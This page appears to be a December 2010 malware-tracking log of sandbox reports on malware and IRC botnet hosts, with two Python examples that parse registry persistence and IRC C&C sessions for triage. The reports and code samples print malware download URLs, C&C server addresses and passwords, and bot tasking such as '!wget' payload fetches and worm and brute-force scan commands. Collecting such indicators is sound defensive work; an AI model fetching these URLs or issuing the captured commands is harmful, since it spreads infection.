Month: December 2010

rolando9.clanhosters.org (malware hosted with United States, Dallas, Theplanet.com Internet Services Inc)


DNS Lookup (Host Name -> IP Address):
  dell-d3e62f7e26 -> 10.1.14.2
  10.1.1.1 -> 10.1.1.1
  wpad -> (none)
  stuypel.free.bg -> 188.40.80.188
  rolando9.clanhosters.org -> 174.121.1.58
  sharo.fileave.com -> 64.62.181.43
Opened listening TCP connection on port: 12380
Download URLs:
  http://188.40.80.188/Thumbsx.db (stuypel.free.bg)
  http://64.62.181.43/0234254.exe (sharo.fileave.com)
Outgoing connection to remote server: stuypel.free.bg, TCP port 80
Outgoing connection to remote server: rolando9.clanhosters.org, TCP port 80
Outgoing connection to remote server: (excerpt truncated)

synyoshi.dyndns.info (botnet hosted with United States, Walnut, Psychz Networks)


DNS Queries:
  Name: synyoshi.dyndns.info, Query Type: DNS_TYPE_A, Query Result: 173.224.219.21, Successful: YES, Protocol: udp
C&C Server: 173.224.219.21:6667
  Nick: n[XP-AUT]176146
  Username: 8977
  Joined Channel: #ganja#
Registry Changes by all processes (Create or Open Changes):
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Update System" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Windows Update System" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "Windows Update System" = C:\Dokumente und (excerpt truncated)

76f.no-ip.biz (malware hosted with


DNS Lookup (Host Name -> IP Address):
  76f.no-ip.biz -> 173.0.3.196
  api.ipinfodb.com -> 67.212.74.82
Download URLs:
  http://67.212.74.82/v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off (api.ipinfodb.com)
Outgoing connection to remote server: 76f.no-ip.biz, port 3333
Outgoing connection to remote server: api.ipinfodb.com, TCP port 80
Registry Changes by all processes (Create or Open Changes):
  HKEY_CURRENT_USER\Software\VB and VBA Program Settings\SrvID\ID "UMUZZPIO31" = Spread
  HKEY_CURRENT_USER\Software\VB and VBA Program Settings\INSTALLDATE "UMUZZPIO31" = (excerpt truncated)
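The registry excerpts in the synyoshi.dyndns.info and 76f.no-ip.biz reports above are what a triager reads for persistence: the same "Windows Update System" entry written to both Run keys and to the Windows Firewall AuthorizedApplications list, pointing at a binary dropped in the user's profile, plus "VB and VBA Program Settings" keys, which is where a VB6 program's SaveSetting call writes. The following is an added example, not code from this page or from any sandbox, that parses the sandbox's 'key "value name" = data' layout and correlates those signals. The sample entries are constructed from the excerpts above with backslashes restored; the truncated firewall data is filled in to match the Run entries for the demo, and the key-path markers and user-writable-path list are the example's own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample in the sandbox's 'key "value name" = data' layout, restored
# from the synyoshi.dyndns.info and 76f.no-ip.biz excerpts on this page. The
# firewall entry's data (truncated on the page) is assumed to match the Run entries.
SAMPLE_REGISTRY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Update System" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Windows Update System" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "Windows Update System" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\SrvID\ID "UMUZZPIO31" = Spread
"""

# One sandbox line: <key> "<value name>" = <data>
ENTRY = re.compile(r'^(?P<key>\S.*?)\s+"(?P<name>[^"]*)"\s*=\s*(?P<data>.*)$')

# Assumed markers (lower-cased substrings of the key path).
AUTOSTART_MARKERS = (
    "\\microsoft\\windows\\currentversion\\run",          # also matches RunOnce etc.
    "\\microsoft\\windows nt\\currentversion\\winlogon",
)
FIREWALL_MARKER = "\\sharedaccess\\parameters\\firewallpolicy\\"
VB_MARKER = "\\vb and vba program settings\\"            # VB6 SaveSetting() location
USER_WRITABLE = ("\\anwendungsdaten\\", "\\application data\\", "\\appdata\\",
                 "\\temp\\", "\\dokumente und einstellungen\\",
                 "\\documents and settings\\", "\\users\\")


@dataclass(frozen=True)
class RegChange:
    key: str
    name: str
    data: str


def parse_registry_changes(text: str) -> list:
    """Parse sandbox registry-change lines; lines that do not fit are skipped."""
    out = []
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            out.append(RegChange(m["key"], m["name"], m["data"].strip()))
    return out


def triage(changes) -> dict:
    """Group changes by what they achieve and correlate autostart with firewall exceptions."""
    autostart, firewall, vb_keys, user_bins = [], [], [], []
    for c in changes:
        k, d = c.key.lower(), c.data.lower()
        if any(m in k for m in AUTOSTART_MARKERS):
            autostart.append(c)
        if FIREWALL_MARKER in k:
            firewall.append(c)
        if VB_MARKER in k:
            vb_keys.append(c.key)
        # an executable living in a user-writable profile directory
        if d.endswith(".exe") and any(p in d for p in USER_WRITABLE) and c.data not in user_bins:
            user_bins.append(c.data)
    # the bot registering itself for autostart AND whitelisting itself in the firewall
    both = {c.name for c in autostart} & {c.name for c in firewall}
    return {
        "autostart": autostart,
        "firewall_exceptions": firewall,
        "autostart_and_firewall": both,
        "vb_settings_keys": vb_keys,
        "user_profile_binaries": user_bins,
    }


if __name__ == "__main__":
    report = triage(parse_registry_changes(SAMPLE_REGISTRY))
    for section, items in report.items():
        print(section, "->", items)
```

The entry name that appears in both the autostart and firewall sets is the strongest single indicator here: a legitimate updater does not whitelist itself under a fake "Windows Update System" label from a per-user AppData path.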

saud.markaz-royal.net (botnet hosted with Germany, Hetzner Online AG)


DNS Queries:
  Name: saud.markaz-royal.net, Query Type: DNS_TYPE_A, Query Result: 46.4.176.169, Successful: YES, Protocol: udp
C&C Server: 46.4.176.169:7493
  Nick: {N}|AUT|XP|pc5|971512
  Username: betqyd
  Server Pass: (null)
  Joined Channel: #null#
  Private Message to Channel #null#: "New Servant."
Hosting information: http://whois.domaintools.com/46.4.176.169

flash.quickupdates.net (botnet hosted with Germany, Dolorem Ipsum)


DNS Lookup (Host Name -> IP Address):
  dell-d3e62f7e26 -> 10.1.8.2
  flash.quickupdates.net -> 46.4.232.76
  www.whatismyip.com -> 72.233.89.200
  checkip.dyndns.org -> 91.198.22.70
Download URLs:
  http://72.233.89.200/ (www.whatismyip.com)
  http://72.233.89.200/ (www.whatismyip.com)
  http://91.198.22.70/ (checkip.dyndns.org)
  http://91.198.22.70/ (checkip.dyndns.org)
C&C Server: 46.4.232.76:5337
  Server Password: (empty)
  Username: blaze
  Nickname: {iNF-00-DEU-XP-DELL-1855}
  Channel: #join (Password: error)
  Channel: #irape
  Channel: #b
  Channel topic: :.aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -r (excerpt truncated)

195.162.68.118 (botnet hosted with Russian Federation, Navitel Rusconnect Ltd)


Remote Host: 195.162.68.118, Port Number: 7777
IRC session:
  PASS google_x1[s7_4]rk-h.tmp
  NICK {N}|USA|XP|COMPUTERNAME|192671
  USER vsqcdz "" "lfjx" :COMPUTERNAME
  JOIN #nonamefase
  PRIVMSG #nonamefase :New Servant.
Now talking in #nonamefase
Modes On: [ #nonamefase ] [ +smntu ]
Commands seen in the channel:
  (niname) !wget http://www.rummagu.com/burnbuddy.exe
  (niname) !wget http://shoponline.muji.fr/images/sss.exe
  (niname) !wget http://www.rummagu.com/burnbuddy.exe
  (niname) !!wget http://www.rummagu.com/burnbuddy.exe
  (niname) !!wget http://www.rummagu.com/burnbuddy.exe
  (niname) !wget http://www.rummagu.com/burnbuddy.exe
  (niname) !msn Boot your (excerpt truncated)
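The IRC botnets in the synyoshi.dyndns.info, saud.markaz-royal.net, flash.quickupdates.net and 195.162.68.118 reports above all follow one shape: a PASS/NICK/USER handshake on an odd port, a JOIN, a "New Servant." check-in, and tasking delivered as !- or .-prefixed commands in operator messages or the channel topic. The block below is an added example, not code from this page or from any sandbox, that parses a captured client/server IRC exchange into those fields, flags bot-style nicks (OS tag, country code and a long numeric id, as in {N}|USA|XP|COMPUTERNAME|192671 or n[XP-AUT]176146) and pulls the download URLs out of the tasking. The sample exchange is constructed from the 195.162.68.118 session and the flash.quickupdates.net channel topic on this page, rewritten as raw IRC lines; the server name irc.example, the operator hostmask niname!op@host, the command prefixes and the nick heuristic are the example's own assumptions.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: the 195.162.68.118 session from this page plus the
# flash.quickupdates.net channel topic (as a 332 reply), written as raw IRC lines.
# Lines starting with ':' come from the server; the rest were sent by the bot.
# 'irc.example' and 'niname!op@host' are assumed names for the demo.
SAMPLE_SESSION = """\
PASS google_x1[s7_4]rk-h.tmp
NICK {N}|USA|XP|COMPUTERNAME|192671
USER vsqcdz "" "lfjx" :COMPUTERNAME
JOIN #nonamefase
PRIVMSG #nonamefase :New Servant.
:irc.example 332 {N}|USA|XP|COMPUTERNAME|192671 #nonamefase :.aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -r
:niname!op@host PRIVMSG #nonamefase :!wget http://www.rummagu.com/burnbuddy.exe
:niname!op@host PRIVMSG #nonamefase :!wget http://shoponline.muji.fr/images/sss.exe
:niname!op@host PRIVMSG #nonamefase :!!wget http://www.rummagu.com/burnbuddy.exe
:niname!op@host PRIVMSG #nonamefase :!msn Boot your
"""

# Assumed nick heuristic: OS tag + 3-letter country code + numeric id at the end.
OS_TAG = re.compile(r"(?<![A-Za-z0-9])(XP|2K|2K3|NT|VISTA|W7)(?![A-Za-z0-9])")
COUNTRY = re.compile(r"(?<![A-Za-z])[A-Z]{3}(?![A-Za-z])")
ID_SUFFIX = re.compile(r"\d{4,}[\]}]?$")
URL = re.compile(r"https?://[^\s\"'<>]+")
# Bot commands are words prefixed with '!' or '.' (e.g. !wget, !!wget, .scan);
# the lookbehind stops domain dots and the '://' of URLs from matching.
COMMAND = re.compile(r"(?<![\w/.:])[!.]{1,2}([A-Za-z]\w*)")
STANDARD_IRC_PORTS = {6667, 6697}


@dataclass
class IrcSession:
    server: str
    port: int
    password: str | None = None
    nick: str | None = None
    user: str | None = None
    channels: list[str] = field(default_factory=list)
    announcements: list[str] = field(default_factory=list)        # what the bot said on join
    commands: list[tuple[str, str]] = field(default_factory=list)  # (command, full message)
    urls: list[str] = field(default_factory=list)


def _split_line(line: str) -> tuple[str | None, str, str, str]:
    """Split one IRC line into (prefix, verb, middle params, trailing param)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    verb, _, rest = line.partition(" ")
    if rest.startswith(":"):
        middle, trailing = "", rest[1:]
    else:
        middle, _, trailing = rest.partition(" :")
    return prefix, verb.upper(), middle, trailing


def is_bot_style_nick(nick: str) -> bool:
    return bool(OS_TAG.search(nick) and COUNTRY.search(nick) and ID_SUFFIX.search(nick))


def parse_session(server: str, port: int, raw: str) -> IrcSession:
    s = IrcSession(server=server, port=port)
    for line in raw.splitlines():
        line = line.strip()
        if not line:
            continue
        prefix, verb, middle, trailing = _split_line(line)
        from_bot = prefix is None                      # no server prefix: our client sent it
        if verb == "PASS" and from_bot:
            s.password = middle
        elif verb == "NICK" and from_bot:
            s.nick = middle
        elif verb == "USER" and from_bot:
            s.user = middle.split(" ", 1)[0]
        elif verb == "JOIN" and from_bot:
            chan = middle.split(" ", 1)[0]
            if chan not in s.channels:
                s.channels.append(chan)
        elif verb == "PRIVMSG" and from_bot:
            s.announcements.append(trailing)
        elif verb in ("PRIVMSG", "332", "TOPIC"):      # operator messages / topic carry tasking
            for m in COMMAND.finditer(trailing):
                s.commands.append((m.group(1).lower(), trailing))
            for u in URL.findall(trailing):
                if u not in s.urls:
                    s.urls.append(u)
    return s


def assess(s: IrcSession) -> list[str]:
    """Turn a parsed session into triage findings."""
    findings = []
    if s.port not in STANDARD_IRC_PORTS:
        findings.append(f"IRC protocol on non-standard port {s.port}")
    if s.nick and is_bot_style_nick(s.nick):
        findings.append(f"bot-style nick {s.nick}")
    if any("new servant" in a.lower() for a in s.announcements):
        findings.append("check-in message 'New Servant.' on join")
    seen = sorted({c for c, _ in s.commands})
    if seen:
        findings.append("tasking commands: " + ", ".join(seen))
    return findings


if __name__ == "__main__":
    session = parse_session("195.162.68.118", 7777, SAMPLE_SESSION)
    print(*assess(session), sep="\n")
    print("payload URLs:", session.urls)
```

The parser keys on who sent each line: the bot's own PASS/NICK/USER/JOIN/PRIVMSG give the credentials and check-in, while anything from the server side (operator PRIVMSGs, the 332 topic reply) is treated as tasking. On a live sensor the same logic applies to any TCP stream that carries these verbs, regardless of port, which is the point: none of the C&C servers above listen on 6667 except one.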